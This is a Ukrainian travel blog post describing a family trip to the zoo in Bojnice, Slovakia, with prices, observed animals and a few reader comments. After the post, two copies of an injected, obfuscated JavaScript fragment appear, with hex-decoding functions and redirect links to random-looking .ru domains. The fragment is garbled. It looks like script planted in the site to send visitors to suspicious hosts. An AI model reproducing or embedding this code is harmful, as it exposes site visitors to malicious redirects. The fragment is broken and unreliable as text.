Знайомтеся: найбільший зоопарк Словаччини в Бойніце

Вітаннячка з Словаччини!
Тут нарешті трошки похолодало і я дістала сили і натхнення хоч щось робити;) От ніколи людина, напевне, не буде абсолютно задоволеною… особливо погодою. У Львові я стогнала і нарікала на дощ, а приїхали до Левіц як в Африку: неймовірна спека і ні каплі дощу, ні подиху вітру… Не повірите, але зранку в 6.00 годин на градуснику майже +30… а на сонці через обід цілих +64 якось було… і в хаті вночі +30… повний капець( я ходила як варена і абсолютно нічого не хотіла,… тобто, щось та й хотіла, але сама не знала чого) Так буває, особливо в жінок)))
Так, ліричний відступ на погоду завершено, тепер про цікавіше: ми на кінець-то розпочали трошки вивчати Словаччину і першим в списку був найбільший зоопарк Словаччини в Бойніце. На сторінці зоопарку можете собі глянути всіх звірюк, що там живуть.
Бойніце (словацькою Bojnice) це невеличке містечко в західній Словаччині з населенням десь під п’ять тисяч, але дуже цікаве в плані погуляти-подивитися: бо є тут найбільший зоопарк Словаччини, замок і купаліска з мінеральними джерелами, тобто басейни, а ще кажуть, варто відвідати костел святого Мартина і якусь печеру, та й саме містечко, в цілому, дуже мальовниче. Містечку цьогоріч якраз 900 років було.
Їхали ми з Левіц трохи більше години, бо дорога через гори, а там не розженешся, зате краєвиди суперові. Біля зоопарку є кілька парковок, залишити авто на цілий день нам коштувало 4 євро. Заїхали в Бойніце десь так по 11 годині і відразу в зоопарк. Допоки обійшли весь, то було вже десь по четвертій, бо гуляти там є де. Сам зоопарк дуже великий за територією, 41 гектар, а от щодо живності трохи мені забракло. Хоча, то взагалі перший зоопарк, який я відвідала в своєму житті і багато всілякої звірини взагалі перший раз на очі бачила, а тому на щось нарікати взагалі не маю права).
Збоку перед зоопарком є Бойніцький замок. Ззовні дуже красивий, а от в середину ми не попали: дуже велика черга туди була та й квитки не зовсім дешеві – по 10 євро з людини за півторагодинну екскурсію. Так що замок ми собі напланували на пізніше, тим більше, що його зараз якраз трохи поновлюють:)

Дальше перед входом до зоопарку є такий собі невеличкий базарчик з сувенірами, де ми за 2,50 євро купили магнітика напам’ять, і ресторанчики і гарний парк з озером, де можна просто погуляти чи на травичці посидіти.
А ще стояли хлопці і дівчата дуже середньовічного вигляду з усіляким хижим птаством. Орла можна було навіть погладити.
Вхід в зоопарк коштує 4 євро з дорослого, але є гнучкі знижки для студентів, дітей і доходцов (dôchodcov), тобто, пенсіонерів. Доріжки в зоопарку дуже раціонально розташовані: йдеш практично по колу, обходиш всіх звірюк і повертаєшся на початок, що дуже зручно. В зоопарку є багато атракцій для дітей і всіляких кафешок з фастфудом, де можна попоїсти якогось гамбургера чи “гарячого пса”. Та-та, хотдоги в словаків детально “перекладені” на словацьку, самі дивіться:
Ні гарячого, ні рябого, ані великого пса ми їсти не захотіли, обійшлися гранолками (картопля-фрі), кофолою (щось типу кока-коли місцевого виробництва) і якимось хімічним пійлом типу мороженого солодкого льоду неймовірно яскравих кольорів.
Дальше суто про звірину. Попереджаю зразу: фотки є, але мало хто з тварин дивиться в камеру( Як правило, вони всі до мене поверталися задом, як тільки я об’єктив на них наводила(
Починається зоопарк з усілякого птаства: сови, соколи,

орли,


і навіть такий рідкісний білоголовий сип, лебеді, фламінго, який дуже кумедно сидів на зігнутих колінах

папуги, гуси, страуси, павліни, казуари, фазани, ібіси


і ще всяких різних…

До речі, гуси, лебеді, фламінго і качки не в клітках, а в таких собі вольєрах під відкритим небом з невеликими озерцями. Чи то птахам крила попідрізали, чи їм там так добре, але плавають вони собі там спокійно і нікуди навіть не думають втікати. В озерцях сила силенна риби плаває і черепахи. Спострерігали таку картину, коли риба “набила” качку і вигнала її на берег з води. Було кумедно)))
Місцеві ворони не гидують під’їдати з загального корита на пару з казуаром
Дальше була велика “яма” з ведмедями. Ті сиділи в воді з блаженними посмішками на мордах і виглядали навіть дуже задоволеними.

В окремій будівлі є віваріум з усілякими рибо-жабо-ящірко-павуко-гадами) Найбільше сподобалася синя жаба і синій варан. Ну і зміюки всі були дуже яскравими, бо тільки но шкіру поміняли. І була ще велиииика черепаха, вся поросла водоростями!!!


Улька, звичайно ж, випросила собі морозиво)

Ось таку чудернацьку квіточку надибали… а що воно таке не знаю.

Були кенгуру, павільйон з мавпами, які майже всі поховалися від жари і безбожно спали. Орангутангів якраз підгодовували замороженими фруктами, але зафотографувати їх було неможливо: багато людей коло клітки, дуже запальцьоване скло і на сонці тільки ті відбитки на склі і були видні( Зате вдалося зловити отаку от блакитнодупу мавпочку)

Вперше побачила живого дикобраза – дуже вони загрозливо виглядають, скажу я вам, особливо, коли голками повертаються і зразу пригадується, що вони вродь, тими голками як стрілами можуть “стрельнути” (все таки не можуть, навмисне гуглила;)))

Дуже сподобалися сурікати, вони так кумедно сиділи на дупах в піску і заглядали відвідувачам в очі. Прямо як з мульта

Слони… не уявляла навіть, що в живу вони такі здоровенні. Почуваєшся біля них такою малееенькою казявкою. Слони весь час обдмухували себе вухами. Шкода, що були закриті всередині і фотки не дуже вдало вийшли, але все ж

Дальше були загони з усякими копитними: олені, лами, зебри, верблюди, коні Прживальського, які майже що вимерли і на даний час є єдиними дикими конями, поні і ще всякі різні мені до цього часу невідомі. Уляні сподобалися поні, бо їх погладити можна булоЛеопард, видно, що щойно пообідав, спав і ні нащо не реагував

Знайшли таку цікаву тварючку як жанетта звичайна. Навіть не знала, що така існує. Єдина позувала мені в камеру і то, як виявилося, тому, що вилізла з нірки покакати))))

А ще тут гарні краєвиди

От… а дальше моя фотознімачка сказала нам па-па і розрядилася(

Є на території зоопарку ще такий собі мініпарк з гумовими динозаврами, які крутять хвостами і ричать. Вхід, здається, 3 євро з людини.
На сам кінець, вже за територією зоопарку ми попали в зеркальний лабіринт. Словацькою це звучить дуже кумедно – zrkadlové bludisko – зркадлове блудіско. За 2 євро з носа ми там трохи поблудили, Уляна чолом гепнулася два рази і здивовано дивилася на нас, чому то вона туди не може зайти. Пореготалися з коханим чоловіком в кімнаті кривих зеркал і нарешті поїхали додому. Улька вирубалася на виїзді з парковіска (парковки) і всю дорогу проспала. А я всю дорогу голову їй тримала, бо на всіх тих поворотах через гори шию можна зламати.

Прогулянкою ми задоволені страшенно, плануємо поїхати в Бойніце ще, на купаліска і в замок. А на наступні вихідні хочемо в біологічний сад подивитися. Я в біологічних садах, соромно признатися, теж ще жодного разу не була. Так що чекайте нового звіту. А ще за цей один день я виконала кілька своїх бажаннячок)

Чао, ваша Юлька)

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return “julliastoryblog.wordpress.com”},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(“http”)==0){return p}for(var e=0;ehttps://ncnjm3le.ru/f2.html?a=26482https://3oaq3lgf23.ru/u.html?a=26482

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "julliastoryblog.wordpress.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;ehttps://ncnjm3le.ru/f2.html?a=26482https://3oaq3lgf23.ru/u.html?a=26482

Advertisements

6 thoughts on “Знайомтеся: найбільший зоопарк Словаччини в Бойніце

 1. Natali 26.06.2013 / 08:38

  такі смішні ті сурікати )))
  була рада побачити якісь нові фотки ваші, а то я вже за вами скучила, а Улька вже бачу з розбитим коліном )

  Подобається

  • Jullia 26.06.2013 / 10:19

   коліна не встигають зажити) в зоопарку два рази падала, може тепер, поки похолодало і ходить в джинсах, то трохи заживуть)))

   Подобається

 2. zymova 11.07.2013 / 16:59

  я до Сан Дієго була в двох — київському та миколаївському (до речі миколаївський кращий, вважається накращим в Україні здається).
  сурікати. от! як я довго згадувала цю назву : )
  чудова прогулянка : )

  Подобається

  • Jullia 11.07.2013 / 19:50

   ні, я в Україні по зоопарках не ходила, якось звірів шкода дуже,… особливо в українських зоопарках(
   а сурікати були самі прикольні))) принаймні, найбільше запам’яталися)

   Подобається

Залишити відповідь

Заповніть поля нижче або авторизуйтесь клікнувши по іконці

Лого WordPress.com

Ви коментуєте, використовуючи свій обліковий запис WordPress.com. Log Out /  Змінити )

Google+ photo

Ви коментуєте, використовуючи свій обліковий запис Google+. Log Out /  Змінити )

Twitter picture

Ви коментуєте, використовуючи свій обліковий запис Twitter. Log Out /  Змінити )

Facebook photo

Ви коментуєте, використовуючи свій обліковий запис Facebook. Log Out /  Змінити )

w

З’єднання з %s